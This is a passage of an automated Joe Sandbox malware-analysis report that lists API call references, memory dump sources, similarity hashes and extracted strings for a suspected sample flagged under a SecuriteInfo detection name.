                                            • _memmove.LIBCMT ref: 6CE940C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 1615890066-4289949731
                                            • Opcode ID: d49e13c049c60bd3c11e07116dcdd6158e0d4817063960575d89da7e63493448
                                            • Instruction ID: 79e381d0fcdaa1b7ec60b24761ba878007929005d4a8141c6d76fa1b7d3deb16
                                            • Opcode Fuzzy Hash: d49e13c049c60bd3c11e07116dcdd6158e0d4817063960575d89da7e63493448
                                            • Instruction Fuzzy Hash: 273195333042149BD7219E5CE880A9AF7B9EB91769F340A2FE161CBB41D7729C4187A3
                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 6CEFC24E
                                              • Part of subcall function 6CEFC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CEFC1DF
                                            • _UnwindNestedFrames.LIBCMT ref: 6CEFC265
                                            • ___FrameUnwindToState.LIBCMT ref: 6CEFC273
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                            • String ID: csm$csm
                                            • API String ID: 2163707966-3733052814
                                            • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                            • Instruction ID: 649f3d46a3f6ded816726de326c23baae34b202fb6f8822d0b1674bc9c8dc86a
                                            • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                            • Instruction Fuzzy Hash: 8F01E431501509BBEF226F91CC45EEA7F7AFF08358F204014BD6815A20D77699B3EBA4
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 4c1ab574538e64ce7de734a339018c154555aabb3d6e851c632c7371a5f3a8d7
                                            • Instruction ID: 9b72a7d8863262d0bc432ce4ea8a726b44c25d1340bf0effd018367d25880e3b
                                            • Opcode Fuzzy Hash: 4c1ab574538e64ce7de734a339018c154555aabb3d6e851c632c7371a5f3a8d7
                                            • Instruction Fuzzy Hash: 8E918FB12087419FD714CF58D884A5BB7F9FB98708F214A2DE895C7B40D734ED068BA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Timetime$Sleep
                                            • String ID:
                                            • API String ID: 4176159691-0
                                            • Opcode ID: 08026941f2f009d3df5a1ebc987571f6b2b5bff36fce0e602b4a6ca67a2a91ca
                                            • Instruction ID: 0cb60ba0700de90c1509d49e19b0d875a1808a45630af26ae6d276f9b610cc4c
                                            • Opcode Fuzzy Hash: 08026941f2f009d3df5a1ebc987571f6b2b5bff36fce0e602b4a6ca67a2a91ca
                                            • Instruction Fuzzy Hash: BB51C0B2F15244AFEB00DFE9C985799BFB4AB05308F24456ED41CDBB40D771D9048B92
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • _rand.LIBCMT ref: 6CEA6DEA
                                              • Part of subcall function 6CEF9E0C: __getptd.LIBCMT ref: 6CEF9E0C
                                            • std::exception::exception.LIBCMT ref: 6CEA6E17
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA6E2C
                                            • std::exception::exception.LIBCMT ref: 6CEA6E3B
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA6E50
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                            • String ID:
                                            • API String ID: 2791304714-0
                                            • Opcode ID: cb5f34e997309def97acba7ce385b523d0c903c34530c639b09f492fbdf8b0df
                                            • Instruction ID: 2a72988f2945621ef1da931b193a0f9e305a647fd609cab0efff7fc47b9fad17
                                            • Opcode Fuzzy Hash: cb5f34e997309def97acba7ce385b523d0c903c34530c639b09f492fbdf8b0df
                                            • Instruction Fuzzy Hash: FA3117B19007449FC760CF68C480A9AFBF4FF08314F54896ED8AA9BB41D775E609CBA1
                                            APIs
                                            • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEA7761
                                            • LeaveCriticalSection.KERNEL32(00000000,?), ref: 6CEA7782
                                            • EnterCriticalSection.KERNEL32(00000018), ref: 6CEA7796
                                            • LeaveCriticalSection.KERNEL32(00000018), ref: 6CEA77CE
                                            • QueueUserWorkItem.KERNEL32(6CEC1D50,00000000,00000010), ref: 6CEA780C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ItemQueueUserWork
                                            • String ID:
                                            • API String ID: 584243675-0
                                            • Opcode ID: ba53f0952b54fca9f12d7c2dcbeef65fc4d4964c4ea093bb075791aceebc6b87
                                            • Instruction ID: d6bf0057bb1fca9965f5a799d0469700408b1a0d15c5369bd6a98e55b4271d91
                                            • Opcode Fuzzy Hash: ba53f0952b54fca9f12d7c2dcbeef65fc4d4964c4ea093bb075791aceebc6b87
                                            • Instruction Fuzzy Hash: 39218371605308AFCB44CFA4C945F9BBBF8FB85309F20855DE4568BA40D730E549CBA0
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 6CE95ACB
                                              • Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E
                                            • __CxxThrowException@8.LIBCMT ref: 6CE95ABC
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • __CxxThrowException@8.LIBCMT ref: 6CE95AE0
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CE95B18
                                            • __CxxThrowException@8.LIBCMT ref: 6CE95B2D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 921928366-0
                                            • Opcode ID: 3ee5495dbcf8ce0b75557e07aad86e85ef3d5aeef2b3703a81d01f5fa6260247
                                            • Instruction ID: a5075cd965e6048666bac046578db18823e68f6bcad5d1804d54f62252711aaa
                                            • Opcode Fuzzy Hash: 3ee5495dbcf8ce0b75557e07aad86e85ef3d5aeef2b3703a81d01f5fa6260247
                                            • Instruction Fuzzy Hash: C80152B29142086FDB04DFE4D841DEE77BCAF18344F50825DE819A7A00EB34D608CBB5
                                            APIs
                                            • __getptd.LIBCMT ref: 6CEFF047
                                              • Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
                                              • Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6
                                            • __amsg_exit.LIBCMT ref: 6CEFF067
                                            • __lock.LIBCMT ref: 6CEFF077
                                            • InterlockedDecrement.KERNEL32(?), ref: 6CEFF094
                                            • InterlockedIncrement.KERNEL32(06F01668), ref: 6CEFF0BF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                            • String ID:
                                            • API String ID: 4271482742-0
                                            • Opcode ID: 7927c61cf09e9928abb17c3a8b9145bcfb3b6dd6647a158c262ba67ea245e863
                                            • Instruction ID: 9a7306bc1e6da8cbcc02c7b3134cbbfa8112e298f91eadcf5addbc03b2d4d4ee
                                            • Opcode Fuzzy Hash: 7927c61cf09e9928abb17c3a8b9145bcfb3b6dd6647a158c262ba67ea245e863
                                            • Instruction Fuzzy Hash: C9015B31E02611ABDB219F65800479A7BB0BF45B5DF354109E834A7B80DB28A946DBD1
                                            APIs
                                            • __getptd.LIBCMT ref: 6CEFF7C8
                                              • Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
                                              • Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6
                                            • __getptd.LIBCMT ref: 6CEFF7DF
                                            • __amsg_exit.LIBCMT ref: 6CEFF7ED
                                            • __lock.LIBCMT ref: 6CEFF7FD
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 6CEFF811
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: e7bc5a374136b10d80fffc7739ebff0eb88ae935df2ac903d3eb38887f40efb9
                                            • Instruction ID: aefec6a8466c359d39d89cb7409c3ddea9869f737e12c95616f40c24b11415d2
                                            • Opcode Fuzzy Hash: e7bc5a374136b10d80fffc7739ebff0eb88ae935df2ac903d3eb38887f40efb9
                                            • Instruction Fuzzy Hash: 5CF09032A557049BDB21ABF88801B8DB7F06F0172CF30414DE474A7BD0DB28564BDAE5
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memcpy_s
                                            • String ID:
                                            • API String ID: 2001391462-3916222277
                                            • Opcode ID: 0bf15fa3b9ec785e00e78a5df0f78a5ceefb3fd9ce4d9823874b0f506039795f
                                            • Instruction ID: 661469243411d7505a5ebc053120b388979db21181f6bdd601ce6b2a5caefd89
                                            • Opcode Fuzzy Hash: 0bf15fa3b9ec785e00e78a5df0f78a5ceefb3fd9ce4d9823874b0f506039795f
                                            • Instruction Fuzzy Hash: EFC189756097028FD704CE28C88866AF7F1BF89318F254A2DE495C7740E734E94ACB82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memcpy_s_memmove_memset
                                            • String ID: EncodingParameters
                                            • API String ID: 4034675494-55378216
                                            • Opcode ID: 711453e87c625484a2cecd253471d33cfcf70018e926e05acbf750a4428592a7
                                            • Instruction ID: 69d3d234abb25878fda325f47c5a0a972492be6a872415d32df394f190e214cb
                                            • Opcode Fuzzy Hash: 711453e87c625484a2cecd253471d33cfcf70018e926e05acbf750a4428592a7
                                            • Instruction Fuzzy Hash: 47916A746093419FD710CF29C880B5BBBE5AFDA708F24491EF8A887351D671E946CBA3
                                            APIs
                                              • Part of subcall function 6CEED820: _memmove.LIBCMT ref: 6CEED930
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CED13D4
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8D8A
                                              • Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8DAF
                                            Strings
                                            • : ciphertext length of , xrefs: 6CED12E4
                                            • for this key, xrefs: 6CED1348
                                            • doesn't match the required length of , xrefs: 6CED1316
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                            • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                            • API String ID: 1025790555-2559040249
                                            • Opcode ID: a5fd4bdef2507f04ee67d66bbccd401863d70cbe5f7906dd08ae65ae79941692
                                            • Instruction ID: 5ca35aa31ce5cd8008d7a9f61a7e75bf3e037b65e450d8dae4fbeb8623957530
                                            • Opcode Fuzzy Hash: a5fd4bdef2507f04ee67d66bbccd401863d70cbe5f7906dd08ae65ae79941692
                                            • Instruction Fuzzy Hash: 31A14B715083809FD324CB68C880BDBB7E9AFD9318F144A1DE19D87750EB70A909CBA3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _malloc_memmove
                                            • String ID: i7l$i7l
                                            • API String ID: 1183979061-1099263514
                                            • Opcode ID: 4f328948bb7d1c0b4db8dda0dfe0f9c912db720f542cbb578eb97940c0a50180
                                            • Instruction ID: a6accad8fd330816e62c3993285e1a1d00fdfc5ef75a0b1e9456cabef31e2970
                                            • Opcode Fuzzy Hash: 4f328948bb7d1c0b4db8dda0dfe0f9c912db720f542cbb578eb97940c0a50180
                                            • Instruction Fuzzy Hash: D0816A71A042059FDB04CF58C580BDEBBB1BF45318F2982A9D8399BB51CB34E985CB92
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 6CEFB50D
                                              • Part of subcall function 6CF01AA0: __87except.LIBCMT ref: 6CF01ADB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
